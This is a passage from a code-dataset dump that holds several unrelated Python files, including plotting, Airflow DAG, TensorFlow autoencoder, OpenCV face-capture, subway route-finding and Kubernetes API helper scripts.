matplotlib.collections.PatchCollection,\n matplotlib.collections.PathCollection,\n ),\n )\n ]\n grid.map_dataframe(sns.swarmplot, **kws)\n for ax in grid.axes.flat:\n ax.set_xticklabels(ax.get_xticklabels(), rotation=90)\n # for ax in grid.axes.flat:\n # if ax.get_title().endswith(\"_number\"):\n # ax.set_yscale(\"log\")\n for ax in grid.axes.flat:\n var = ax.get_title().replace(\"cluster = \", \"\")\n f = aov.loc[var, \"F\"]\n p = aov.loc[var, \"p-unc\"]\n stats = f\"\\nF = {f:.3f}; p = {p:.3e}\"\n ax.set_title(var + stats)\n\n grid.savefig(\n output_dir / f\"differential_cell_types.{attr}.boxen_swarm_plot.svg\",\n **figkws,\n )\n plt.close(grid.fig)\n\n\ntest_res = pd.concat(_test_res)\ntest_res.to_csv(output_dir / \"differential_cell_types.anova_test_results.csv\")\n","sub_path":"src/supervised.py","file_name":"supervised.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"173989445","text":"#\n# Copyright 2021 Ocean Protocol Foundation\n# SPDX-License-Identifier: Apache-2.0\n#\n\n\"\"\"\nThis module holds following default values for Gas price, Gas limit and more.\n\n\"\"\"\n\nENV_GAS_PRICE = \"GAS_PRICE\"\nENV_MAX_GAS_PRICE = \"MAX_GAS_PRICE\"\n\nGAS_LIMIT_DEFAULT = 1000000\nMIN_GAS_PRICE = 1000000000\n\nZERO_ADDRESS = \"0x0000000000000000000000000000000000000000\"\n\nDEFAULT_NETWORK_NAME = \"ganache\"\nNETWORK_NAME_MAP = {\n 1: \"Mainnet\",\n 3: \"Ropsten\",\n 4: \"Rinkeby\",\n 56: \"Binance Smart Chain\",\n 137: \"Polygon\",\n 1337: \"Ganache\",\n}\n\nNETWORK_TIMEOUT_MAP = {\n \"mainnet\": 10 * 60,\n \"ropsten\": 10 * 60,\n \"rinkeby\": 5 * 60,\n \"bsc\": 10 * 60,\n \"polygon\": 10 * 60,\n \"ganache\": 2,\n}\n","sub_path":"ocean_lib/web3_internal/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"609900443","text":"import Stem\n\n\nclass StopList:\n def __init__(self):\n self.list = Stem.stem(['', 'a', 'all', 'and', 'are', 'at', 'be', 'been', 'but',\n 'decided', 'do', 'eat', 'few',\n 'for', 'from', 'get', 'go', 'had', 'have', 'he', 'here', 'if', 'in',\n 'into', 'is', 'ive', 'it', 'item', 'items', 'keep', 'menu', 'my',\n 'next', 'of', 'she', 'some',\n 'than', 'that', 'the', 'there',\n 'them', 'they', 'this', 'til', 'till', 'to', 'until', 'up',\n 'what', 'when', 'where',\n 'who', 'with', 'write', 'you', 'your'])\n\n self.list2 = Stem.stem(['', ' ', 'i', 'me', 'mine', 'he', 'she', 'it', 'a', 'an', 'the',\n 'above', 'below', 'while', 'as', 'until', 'of', 'at',\n 'down', 'if', 'to', 'or', 'was', 'were', 'itself', 'for',\n 'other', 'both', 'any', 'all', 'between', 'do', 'does',\n 'did', 'on', 'own', 'who', 'whom', 'this', 'that', 'has',\n 'have', 'here', 'some', 'why', 'same',\n 'so', 'is', 'be'])\n\n # maybe add:\n","sub_path":"StopList.py","file_name":"StopList.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"615903869","text":"\"\"\"DSD Permits _dags file.\"\"\"\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.subdag_operator import SubDagOperator\nfrom airflow.models import DAG\nfrom trident.util import general\nfrom trident.util.notifications import afsys_send_email\nfrom dags.permits.permits_jobs import *\nfrom dags.permits.permits_subdags import *\n\nfrom trident.util.seaboard_updates import *\nconf = general.config\nargs = general.args\nschedule = general.schedule['dsd_approvals']\nstart_date = general.start_date['dsd_approvals']\n\n#: Dag spec for dsd permits\ndag = DAG(dag_id='dsd_permits',\n default_args=args,\n start_date=start_date,\n schedule_interval=schedule,\n catchup=False)\n\n#: Join BIDs to 4 files using subdag\nall_accela = SubDagOperator(\n task_id='get_create_accela',\n subdag=get_create_accela_subdag(),\n dag=dag)\n\n#: Subset files\nall_pts = SubDagOperator(\n task_id='get_create_pts',\n subdag=get_create_pts_subdag(),\n dag=dag)\n\nexec_snowflake = SubDagOperator(\n task_id=\"snowflake\",\n subdag=snowflake_subdag(),\n dag=dag)\n\n#: Upload 4 files using subdag\nupload_set1_files = SubDagOperator(\n task_id='upload_set1_files',\n subdag=upload_set1_files_subdag(),\n dag=dag)\n\n#: Upload 4 files using subdag\nupload_set2_files = SubDagOperator(\n task_id='upload_set2_files',\n subdag=upload_set2_files_subdag(),\n dag=dag)\n\nupdate_set1_md = get_seaboard_update_dag('development-permits-set1.md', dag)\nupdate_set2_md = get_seaboard_update_dag('development-permits-set2.md', dag)\n\n#: Update data inventory json\nupdate_set1_json_date = PythonOperator(\n task_id='update_set1_json_date',\n python_callable=update_json_date,\n provide_context=True,\n op_kwargs={'ds_fname': 'development-permits-set1'},\n dag=dag)\n\n#: Update data inventory json\nupdate_set2_json_date = PythonOperator(\n task_id='update_set2_json_date',\n python_callable=update_json_date,\n provide_context=True,\n op_kwargs={'ds_fname': 'development-permits-set2'},\n dag=dag)\n\n#: Create TSW subset\ncreate_tsw_file = PythonOperator(\n task_id='create_tsw',\n python_callable=create_tsw_subset,\n dag=dag)\n\n#: Create PW subset\ncreate_pw_sap_file = PythonOperator(\n task_id='create_pw_sap',\n python_callable=create_pw_sap_subset,\n dag=dag)\n\n# Upload TSW subset\nupload_tsw = S3FileTransferOperator(\n task_id=\"upload_tsw_subset\",\n source_base_path=conf['prod_data_dir'],\n source_key=f\"dsd_permits_row.csv\",\n dest_s3_bucket=\"{{ var.value.S3_DATA_BUCKET }}\",\n dest_s3_conn_id=\"{{ var.value.DEFAULT_S3_CONN_ID }}\",\n dest_s3_key=f\"tsw/dsd_permits_row.csv\",\n replace=True,\n dag=dag)\n\n# Upload TSW subset\nupload_pw_sap = S3FileTransferOperator(\n task_id=\"upload_pw_subset\",\n source_base_path=conf['prod_data_dir'],\n source_key=f\"dsd_permits_public_works.csv\",\n dest_s3_bucket=\"{{ var.value.S3_DATA_BUCKET }}\",\n dest_s3_conn_id=\"{{ var.value.DEFAULT_S3_CONN_ID }}\",\n dest_s3_key=f\"dsd/dsd_permits_public_works.csv\",\n replace=True,\n dag=dag,\n )\n\n#: Execution rules\nall_accela>>exec_snowflake\nall_pts>>exec_snowflake\nall_accela>>upload_set2_files\nall_pts>>upload_set1_files\nupload_set1_files>>[update_set1_md,update_set1_json_date]\nupload_set2_files>>[update_set2_md,update_set2_json_date]\nall_accela>>[create_tsw_file,create_pw_sap_file]\nall_pts>>[create_tsw_file,create_pw_sap_file]\ncreate_tsw_file>>upload_tsw\ncreate_pw_sap_file>>upload_pw_sap\n","sub_path":"poseidon/dags/permits/permits_dags.py","file_name":"permits_dags.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"416146078","text":"# ============================================================================\n# FILE: line.py\n# AUTHOR: Shougo Matsushita \n# License: MIT license\n# ============================================================================\n\nfrom .base import Base\n\nLINE_NUMBER_SYNTAX = (\n 'syntax match deniteSource_lineNumber '\n r'/\\d\\+\\(:\\d\\+\\)\\?/ '\n 'contained containedin=')\nLINE_NUMBER_HIGHLIGHT = 'highlight default link deniteSource_lineNumber LineNR'\n\n\nclass Source(Base):\n\n def __init__(self, vim):\n super().__init__(vim)\n\n self.name = 'line'\n self.kind = 'file'\n self.matchers = ['matcher_regexp']\n self.sorters = []\n\n def on_init(self, context):\n context['__linenr'] = self.vim.current.window.cursor[0]\n context['__bufname'] = self.vim.current.buffer.name\n context['__bufnr'] = self.vim.current.buffer.number\n context['__direction'] = 'all'\n context['__fmt'] = '%' + str(len(\n str(self.vim.call('line', '$')))) + 'd: %s'\n if context['args'] and (context['args'][0] == 'all' or\n context['args'][0] == 'forward' or\n context['args'][0] == 'backward'):\n context['__direction'] = context['args'][0]\n\n def highlight(self):\n self.vim.command(LINE_NUMBER_SYNTAX + self.syntax_name)\n self.vim.command(LINE_NUMBER_HIGHLIGHT)\n\n def gather_candidates(self, context):\n linenr = context['__linenr']\n lines = [{'word': x,\n 'abbr': (context['__fmt'] % (i + 1, x)),\n 'action__path': context['__bufname'],\n 'action__line': (i + 1)}\n for [i, x] in\n enumerate(self.vim.call(\n 'getbufline', context['__bufnr'], 1, '$'))]\n if context['__direction'] == 'all':\n return lines\n elif context['__direction'] == 'backward':\n return list(reversed(lines[:linenr])) + list(\n reversed(lines[linenr:]))\n else:\n return lines[linenr-1:] + lines[:linenr-1]\n","sub_path":"sources_non_forked/denite.nvim/rplugin/python3/denite/source/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"469643032","text":"import yaml\n\ntry:\n file = open('config.yaml', 'r')\n config = yaml.load(file, Loader=yaml.FullLoader)\nexcept FileNotFoundError as e:\n print('Config file not found! Make sure you have config.yaml in the project directory')\n raise e\n\nDEBUG = True\n\nDATABASES = {'default': config['DATABASES']['POSTGRES']}\n","sub_path":"traitcuration/settings_dev.py","file_name":"settings_dev.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"127558376","text":"import tensorflow as tf\nimport numpy as np\n\nfrom ops import *\n\nhe_init = tf.contrib.layers.variance_scaling_initializer\n\nclass Autoencoder():\n ''' Autoencoder including encode, decode networks. '''\n def __init__(self, img_shape=(64, 64, 3), zsize=128):\n # Input image shape: x, y, channels\n self.img_shape = img_shape\n # latent (z) vector length\n self.zsize = zsize\n self.g_bns = [\n batch_norm(name='g_bn{}'.format(i,)) for i in range(6)]\n\n def generator(self, inputs, training, scope='generator', reuse=None):\n with tf.variable_scope(scope, reuse=reuse):\n \n # self.gf_dim = 64\n\n self.z_, self.h0_w, self.h0_b = linear(inputs, 8192, 'g_h0_lin', with_w=True)\n # self.z_ = tf.layers.dense(inputs, 8192, kernel_initializer=he_init())\n \n hs = [None]\n hs[0] = tf.reshape(self.z_, [-1, 4, 4, 512])\n hs[0] = tf.nn.relu(self.g_bns[0](hs[0], training))\n\n i = 1 # Iteration number.\n depth_mul = 8 # Depth decreases as spatial component increases.\n size = 8 # Size increases as depth decreases.\n\n while size < 64:\n hs.append(None)\n name = 'g_h{}'.format(i)\n hs[i], _, _ = conv2d_transpose(hs[i-1],\n [64, size, size, 64*depth_mul], name=name, with_w=True)\n hs[i] = tf.nn.relu(self.g_bns[i](hs[i], training))\n\n i += 1\n depth_mul //= 2\n size *= 2\n\n hs.append(None)\n name = 'g_h{}'.format(i)\n hs[i], _, _ = conv2d_transpose(hs[i - 1],\n [64, size, size, 3], name=name, with_w=True)\n \n return tf.nn.tanh(hs[i])\n\n\n\n","sub_path":"autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"393883182","text":"import numpy as np\nimport cv2\n#create haar cascade classifier\ndetector = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n#start webcam\ncap = cv2.VideoCapture(0)\n#ask user for the id of the face it wants to store in dataset\nid = raw_input('enter user id: ')\nsamplenum = 0\nwhile(True):\n\t#capture webcam image\n ret, img = cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n #detect faces in the image\n faces = detector.detectMultiScale(gray, 1.3, 5)\n #store the faces in the dataset and include the user id in the filepath\n if(len(faces)!=0):\n for (x,y,w,h) in faces:\n samplenum = samplenum + 1\n cv2.imwrite(\"dataSet/User.\"+str(id)+\".\"+str(samplenum)+\".jpg\",gray[y:y+h,x:x+w])\n #draw a rectangle around the detected face\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\n cv2.waitKey(100)\n cv2.imshow('face',img)\n cv2.waitKey(1)\n #we take 301 sample images\n if(samplenum > 300) :\n break \ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"datasetCreator.py","file_name":"datasetCreator.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"166583850","text":"import subprocess\nimport os\nfrom os import listdir\nfrom os.path import join, isfile, isdir\nfrom subprocess import call\nfrom tqdm import tqdm\nimport cv2\nfrom PIL import Image\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser()\nparser.add_argument('--train', action='store_true')\nargs = parser.parse_args()\n\nDATASET_DIR='/raid/datasets/MTN_data'\n# DATASET_DIR = '/raid/datasets/New_Sejong_RCV_dataset/RGBTDv4/'\n\ntxt_list = [f for f in listdir(join(DATASET_DIR,'txt')) if isfile(join(join(DATASET_DIR,'txt'), f))]\n\n\nif args.train:\n save_path = join('datas','train')\n txt_path = [p for p in txt_list if p=='train.txt']\nelse:\n save_path = join('datas','test')\n txt_path = [p for p in txt_list if p=='test.txt']\n\nif os.path.isdir(join(save_path,'THER')) is False:\n print('Create path: {0}'.format(join(save_path,'THER')))\n os.makedirs(join(save_path,'THER'))\n\nif os.path.isdir(join(save_path,'RGB')) is False:\n print('Create path: {0}'.format(join(save_path,'RGB')))\n os.makedirs(join(save_path,'RGB'))\n\nf = open(join(join(DATASET_DIR,'txt'), txt_path[0]), mode='rt')\n\nfor i,line in enumerate(tqdm(f)):\n# #potenit\n# img_list = line.split('/')\n# if img_list[-1][-1] == '\\n':\n# ther = join(img_list[0],img_list[1],'Ther',img_list[-1][:-1])\n# rgb = join(img_list[0],img_list[1],'RGB',img_list[-1][:-1])\n# else:\n# ther = join(img_list[0],img_list[1],'Ther',img_list[-1])\n# rgb = join(img_list[0],img_list[1],'RGB',img_list[-1])\n \n # MTN\n img_list = line.split(' ')\n rgb = img_list[0]\n ther = img_list[-1][:-1]\n\n call(['cp','-p',join(DATASET_DIR,ther),join(save_path,'THER')])\n call(['cp','-p',join(DATASET_DIR,rgb), join(save_path,'RGB')])\n","sub_path":"Pseudo-RGB/sum_image.py","file_name":"sum_image.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"218802060","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport time\nimport collections\n\n\nline1 = [\n '苹果园', '古城路', '八角游乐园', '八宝山', '玉泉路', '五棵松',\n '万寿路', '公主坟', '军事博物馆', '木樨地', '南礼士路', '复兴门',\n '西单', '天安门西', '天安门东', '王府井', '东单', '建国门', '永安里',\n '国贸', '大望路', '四惠', '四惠东'\n]\n\nline2 = [\n '西直门', '车公庄', '阜成门', '复兴门', '长椿街', '宣武门', '和平门',\n '前门', '崇文门', '北京站', '建国门', '朝阳门', '东四十条', '东直门',\n '雍和宫', '安定门', '鼓楼大街', '积水潭'\n]\n\nline4 = [\n '天宫院', '生物医药基地', '义和庄', '黄村火车站', '黄村西大街',\n '清源路', '枣园', '高米店南', '高米店北', '西红门', '新宫',\n '公益西桥', '角门西', '马家堡', '北京南站', '陶然亭', '菜市口',\n '宣武门', '西单', '灵境胡同', '西四', '平安里', '新街口', '西直门',\n '动物园', '国家图书馆', '魏公村', '人民大学', '海淀黄庄', '中关村',\n '北京大学东门', '圆明园', '西苑', '北宫门', '安河桥北'\n]\n\nline5 = [\n '宋家庄', '刘家窑', '蒲黄榆', '天坛东门', '磁器口', '崇文门', '东单',\n '灯市口', '东四', '张自忠路', '北新桥', '雍和宫', '和平里北街', '和平西桥',\n '惠新西街南口', '惠新西街北口', '大屯桥东', '北苑路北', '立水桥南', '立水桥',\n '天通苑南', '天通苑', '天通苑北'\n]\n\nline6 = [\n '海淀五路居', '慈寿寺', '白石桥南', '车公庄西', '车公庄', '平安里',\n '北海北', '南锣鼓巷', '东四', '朝阳门', '东大桥', '呼家楼', '金台路',\n '十里堡', '青年路', '褡裢坡', '黄渠', '常营', '草房', '物资学院路',\n '通州北关', '通运门', '北运河西', '北运河东', '郝家府', '东夏园', '潞城'\n]\n\nline8 = [\n '朱辛庄', '育知路', '平西府', '回龙观东大街', '霍营', '育新', '西小口',\n '永泰庄', '林萃桥', '森林公园南门', '奥林匹克公园', '奥体中心', '北土城',\n '安华桥', '鼓楼大街', '什刹海', '南锣鼓巷'\n]\n\nline9 = [\n '国家图书馆', '白石桥南', '白堆子', '军事博物馆', '北京西站', '六里桥东',\n '六里桥', '七里庄', '丰台东大街', '丰台南路', '科怡路', '丰台科技园', '郭公庄'\n]\n\nline10 = [\n '劲松', '双井', '国贸', '金台夕照', '呼家楼', '团结湖', '农业展览馆',\n '亮马桥', '三元桥', '太阳宫', '芍药居', '惠新西街南口', '安贞门', '北土城',\n '健德门', '牡丹园', '西土城', '知春路', '知春里', '海淀黄庄', '苏州街',\n '巴沟', '火器营', '长春桥', '车道沟', '慈寿寺', '西钓鱼台', '公主坟', '莲花桥',\n '六里桥', '西局', '泥洼', '丰台站', '首经贸', '纪家庙', '草桥', '角门西',\n '角门东', '大红门', '石榴庄', '宋家庄', '成寿寺', '分钟寺', '十里河', '潘家园'\n]\n\nline13 = [\n '西直门', '大钟寺', '知春路', '五道口', '上地', '西二旗', '龙泽', '回龙观',\n '霍营', '立水桥', '北苑', '望京西', '芍药居', '光熙门', '柳芳', '东直门'\n]\n\nline14 = ['张郭庄', '园博园', '大瓦窑', '郭庄子', '打井', '七里庄', '西局']\n\nline15 = [\n '俸伯', '顺义', '石门', '南法信', '后沙峪', '花梨坎', '国展',\n '孙河', '马泉营', '崔各庄', '望京', '望京西'\n]\n\n\nSegment = collections.namedtuple('Segment', ['start', 'end'])\n\n\nclass Edge(Segment):\n def __unicode__(self):\n return self.start + ' --> ' + self.end\n\n\n# class Edge(object):\n# __slots__ = ['start', 'end']\n#\n# def __init__(self, start, end):\n# self.start = start\n# self.end = end\n#\n# def __unicode__(self):\n# return self.start + ' --> ' + self.end\n\n\nclass Path(list):\n def stations(self):\n end = self[-1].end\n return [e.start for e in self] + [end]\n\n def __unicode__(self):\n return reduce(lambda x, y: x + ' --> ' + y, self.stations())\n\n\nclass Graph(object):\n lines = {\n 'line1': (line1, False),\n 'line2': (line2, True),\n 'line4': (line4, False),\n 'line10': (line10, True),\n 'line13': (line13, False),\n }\n\n def __init__(self):\n self._all_edges = self._make_graph()\n\n self.stations = set()\n for e in self._all_edges:\n self.stations.add(e.start)\n\n self._transfer_stations = set()\n for s in self.stations:\n if len([e for e in self._all_edges if e.start == s]) > 2:\n self._transfer_stations.add(s)\n\n @staticmethod\n def gen_edges(line, circle=False):\n edges = []\n z = [iter(line[i:]) for i in range(2)]\n for ab in zip(*z):\n edges.append(Edge(*ab))\n if circle:\n edges.append(Edge(line[-1], line[0]))\n return edges\n\n def _make_graph(self):\n _all_edges = set()\n for line, circle in self.lines.values():\n _all_edges.update(set(self.gen_edges(line, circle=circle)))\n _all_edges.update(set(self.gen_edges(line[::-1], circle=circle)))\n return _all_edges\n\n def _get_edges_by_station(self, station):\n \"\"\"获取给定station的所有的edge\"\"\"\n return [e for e in self._all_edges if e.start == station]\n\n def get_paths(self, src, dst):\n if src == dst:\n return unicode(Edge(src, dst))\n\n paths = []\n for e in self._get_edges_by_station(src):\n paths.append(Path([e]))\n\n while True:\n history = set()\n history_s = set()\n length = None\n\n temp_path_list = []\n for path in paths:\n if length is not None:\n len(path) > length\n temp_path_list.append(path + [''])\n continue\n\n if not path[-1]:\n temp_path_list.append(path)\n continue\n\n if path[-1].end == dst:\n length = len(path)\n temp_path_list.append(path)\n continue\n\n temp_paths = []\n for e in edges:\n if e not in history:\n if path[-1].end == e.start and path[-1].start != e.end:\n temp_paths.append(e)\n history.add(e)\n\n if not temp_paths:\n temp_path_list.append(path + [''])\n continue\n\n _all_stations = set()\n for ps in paths:\n for p in ps:\n _all_stations.add(p.start)\n _all_stations.add(p.end)\n\n for t in temp_paths:\n temp_path_list.append(path + [t])\n\n paths = temp_path_list\n\n flags = []\n for p in paths:\n if p[-1]:\n flags.append(p[-1].end == dst)\n else:\n flags.append(True)\n\n if all(flags):\n return paths\n\n\nif __name__ == \"__main__\":\n graph = make_graph(line1=(line1, False),\n line2=(line2, True),\n line4=(line4, False),\n line10=(line10, True),\n line13=(line13, False))\n\n transfer_stations = get_transfer_stations(graph)\n\n # src = '八宝山'\n # dst = '知春路'\n #\n # for ps in get_paths(graph, src, dst):\n # if ps[-1] and ps[-1].end == dst:\n # print '**************************************'\n # for p in ps:\n # print unicode(p)\n","sub_path":"python/others/subway.py","file_name":"subway.py","file_ext":"py","file_size_in_byte":7871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"326050957","text":"#!/usr/bin/python3\n\nimport base64\nimport random\nimport string\nimport os\nimport sys\nimport yaml\nimport io\nimport time\nimport requests\n\nfirstTimeAdding = True\n\n# some random high value port, can change using setPort command\nK8S_PORT = 12321\n\n'''\nopen template file to fill in values later\n'''\nwith open(\"template.yaml\", \"r\") as stream:\n z = yaml.safe_load(stream)\n\n\ndef changeApiVersion(api):\n z['apiVersion'] = api\n\n\ndef changeName(name):\n if (type(name) != str):\n if (type(name) == list):\n name = name[0]\n z['metadata']['name'] = str(name)\n\n\ndef updateReplicas(n):\n z['spec']['replicas'] = int(n)\n\n\ndef updateSelector(selector):\n z['spec']['selector']['matchlabels']['app'] = selector\n\n\ndef addContainer(arg):\n c = z['spec']['template']['spec']['containers']\n toAppend = c[0].copy()\n try:\n command = arg[2:]\n image = arg[1]\n name = arg[0]\n toAppend['name'] = name\n toAppend['image'] = image\n toAppend['command'] = list(command)\n c.append(toAppend)\n except Exception as e:\n print(e)\n print(\"syntax - addContainer \")\n print(\"eg - addContainer container1 ubuntu ping 1.1.1.1\")\n raise(e)\n\n global firstTimeAdding\n if (firstTimeAdding):\n deleteContainer(0)\n firstTimeAdding = False\n\n\ndef getContainers():\n return (z['spec']['template']['spec']['containers'])\n\n\ndef getName():\n return z['metadata']['name']\n\n\ndef getReplicas():\n return z['spec']['replicas']\n\n\ndef getApiVersion():\n return z['apiVersion']\n\n\ndef deleteContainer(index):\n c = z['spec']['template']['spec']['containers']\n try:\n del c[int(index)]\n except Exception as e:\n raise(e)\n\n\ndef getSelector():\n return z['spec']['selector']['matchlabels']['app']\n\n\ndef writeToFile(filename):\n\n with io.open(filename, \"w\") as f:\n yaml.dump(z, f, default_flow_style=False,\n explicit_start=True,\n allow_unicode=True, sort_keys=False)\n\n f.close()\n\n\ndef openProxy():\n\n try:\n pid = os.fork()\n except Exception as e:\n raise (e)\n\n if (pid == 0):\n command = \"kubectl proxy -p {}\".format(K8S_PORT)\n params = command.split(\" \")\n\n try:\n os.execvp(params[0], params)\n except Exception as e:\n raise e\n\n else:\n\n time.sleep(10)\n # let child sleep in background\n\n\ndef setPort(p):\n\n global K8S_PORT\n K8S_PORT = int(p)\n\n\ndef pushYamlFile(filename):\n try:\n\n u = \"http://localhost:{}/\".format(K8S_PORT) +\\\n \"apis/apps/v1/namespaces/default/deployments\"\n\n print(u)\n with open(filename, \"r\") as stream:\n z = yaml.safe_load(stream)\n\n resp = requests.post(u, json=z)\n if resp.status_code != 201:\n # This means something went wrong.\n raise Exception(\"Error with code \" +\n str(resp.status_code))\n else:\n print(\"Success with status code 201\")\n\n except Exception as e:\n print(e)\n\n\ndef runFile(filename):\n\n try:\n pid = os.fork()\n except Exception as e:\n print(e)\n raise(e)\n\n if (pid == 0): # run in child process\n\n # push it to server\n pushYamlFile(filename)\n\n else:\n\n # wait for child process to terminate\n os.waitpid(pid, 0)\n\n\ndef parseStatusJson(dct):\n\n for pods in dct['items']:\n\n name = pods[\"metadata\"][\"name\"]\n\n workers = pods[\"spec\"][\"containers\"]\n\n print(\"Pod name: {}\".format(name))\n\n for w in workers:\n print(\"Worker Name:{}\".format(w[\"name\"]))\n print(\"Worker Image:{}\".format(w[\"image\"]))\n print(\"Worker Job:{}\\n\".format(w[\"command\"]))\n\n print(\"==================\")\n\n\ndef checkStatus():\n try:\n pid = os.fork()\n except Exception as e:\n raise (e)\n\n if (pid == 0):\n\n url = \"http://localhost:{}/\".format(K8S_PORT) + \\\n \"api/v1/namespaces/default/pods\"\n\n resp = requests.get(url)\n if resp.status_code != 200:\n # This means something went wrong.\n raise Exception(\"Error with code \" +\n str(resp.status_code))\n\n else:\n print(\"Success with status code 200, \\\n parsing response...\")\n\n parseStatusJson(resp.json())\n\n else:\n os.waitpid(pid, 0)\n\n\ndef deletePod(podName):\n\n url = \"http://localhost:{}/\".format(K8S_PORT) + \\\n \"api/v1/namespaces/default/pods/{}\".format(podName)\n\n try:\n\n resp = requests.delete(url)\n\n if (resp.status_code not in (200, 202)):\n raise Exception(\"Error with code \" +\n str(resp.status_code))\n else:\n print(\"Successfully deleted pod\".format(podName))\n except Exception as e:\n raise e\n\ndef getWorkerNameByCommand(pod, command):\n\n url = \"http://localhost:{}/\".format(K8S_PORT) + \\\n \"api/v1/namespaces/default/pods\"\n\n resp = requests.get(url)\n if resp.status_code != 200:\n # This means something went wrong.\n raise Exception(\"Error with code \" +\n str(resp.status_code))\n\n else:\n print(\"Success with status code 200, \\\n parsing response...\")\n\n dct = resp.json()\n \n foundPod = False\n \n for pods in dct['items']:\n \n name = pods[\"metadata\"][\"name\"]\n if (name == pod):\n foundPod = pods\n break\n \n if (foundPod):\n workers = foundPod[\"spec\"][\"containers\"]\n \n myCommand = command\n for w in workers:\n \n workerCommand = w['command']\n if (workerCommand == myCommand):\n return w\n \n raise Exception(\"Command not found in pod\")\n \n else:\n raise Exception(\"Pod not found\")\n\ndef getLogsByCommand(param): \n \n pod = param[0]\n command = param[1:]\n \n worker = getWorkerNameByCommand(pod, command)\n workerName = worker[\"name\"]\n \n return getLogs([pod, workerName])\n \ndef getLogs(params):\n \n pod = params[0]\n \n try:\n container = params[1]\n except Exception as e:\n container = False\n \n url = \"http://localhost:{}/\".format(K8S_PORT) + \\\n \"api/v1/namespaces/default/pods/\" + \\\n \"{}/log\".format(pod)\n \n if (container):\n param = {'container': container}\n else:\n param = None\n \n try:\n if (param):\n resp = requests.get(url, params = param)\n else:\n resp = requests.get(url)\n except Exception as e:\n raise(e)\n \n if (resp.status_code == 204):\n return \"No logs for pod: {}, container :{}\".\\\n format(pod, container[0])\n \n elif (resp.status_code != 200):\n raise Exception(\"Error code {} when querying api\\n\"\\\n .format(resp.status_code) +\\\n \"Error message: {}\"\\\n .format(resp.json()['message']))\n \n return resp.text\n \n \n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"211372287","text":"# -*- coding: utf-8 -*-\nimport json\nimport logging\n\nfrom luckycommon.model.coupon import GroupCoupon\nfrom luckycommon.social.model.share import *\nfrom luckycommon.utils.decorator import sql_wrapper\nfrom luckycommon.utils.tz import now_ts\n\n_LOGGER = logging.getLogger('lucky')\n\n\n@sql_wrapper\ndef submit(user_id, date_str, share_type):\n item = SocialShare.query.filter(SocialShare.user_id == user_id)\\\n .filter(SocialShare.date == date_str)\\\n .filter(SocialShare.share_type == share_type)\\\n .with_lockmode('update').first()\n if not item:\n item = SocialShare()\n item.user_id = user_id\n item.date = date_str\n item.share_type = share_type\n item.share_times = 0\n if share_type == SHARE_TYPE.DETAIL:\n # create coupon\n coupon = GroupCoupon()\n coupon.user_id = user_id\n coupon.title = ''\n coupon.total_count = SHARE_COUPON_INTERNAL_COUNT\n coupon.left_count = SHARE_COUPON_INTERNAL_COUNT\n coupon.expire_ts = now_ts() + SHARE_COUPON_EXPIRE_TS\n coupon.campaign_id = 'social_share'\n coupon.save(auto_commit=False)\n orm.session.flush()\n item.extend = json.dumps({'coupon': coupon.id})\n item.share_times += 1\n item.save(auto_commit=False)\n orm.session.commit()\n return item\n","sub_path":"luckycommon/social/db/share.py","file_name":"share.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"74745428","text":"v_lis = list(map(int, input().split()))\nm = [500, 100, 50, 10]\nd = {}\nfor i, k in enumerate(m):\n d[k] = v_lis[i]\nfor i in range(int(input())):\n input_line = input().split()\n b = int(input_line[0])\n x_lis = list(map(int, input_line[1:]))\n s = sum([x * x_lis[i] for i, x in enumerate(m)])\n r = s - b\n q_lis = []\n for i, k in enumerate(sorted(d, reverse=True)):\n q = r // k\n p = d[k] - q\n if p >= 0:\n q_lis.append(q)\n r -= (k * q)\n else:\n if i != 2:\n print('impossible')\n break\n else:\n q_lis.append(0)\n else:\n if r == 0:\n print(' '.join(map(str, q_lis)))\n for i, k in enumerate(m):\n d[k] -= q_lis[i]\n d[k] += x_lis[i]\n else:\n print('impossible')\n","sub_path":"takumiy/B/B026.py","file_name":"B026.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"555501259","text":"import matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nimport os, pickle\r\nimport numpy as np\r\nopj = os.path.join\r\n\r\ncw = [np.array([78., 121., 165.])/255.,\r\nnp.array([241., 143., 59.])/255.,\r\nnp.array([224., 88., 91.])/255.,\r\nnp.array([119., 183., 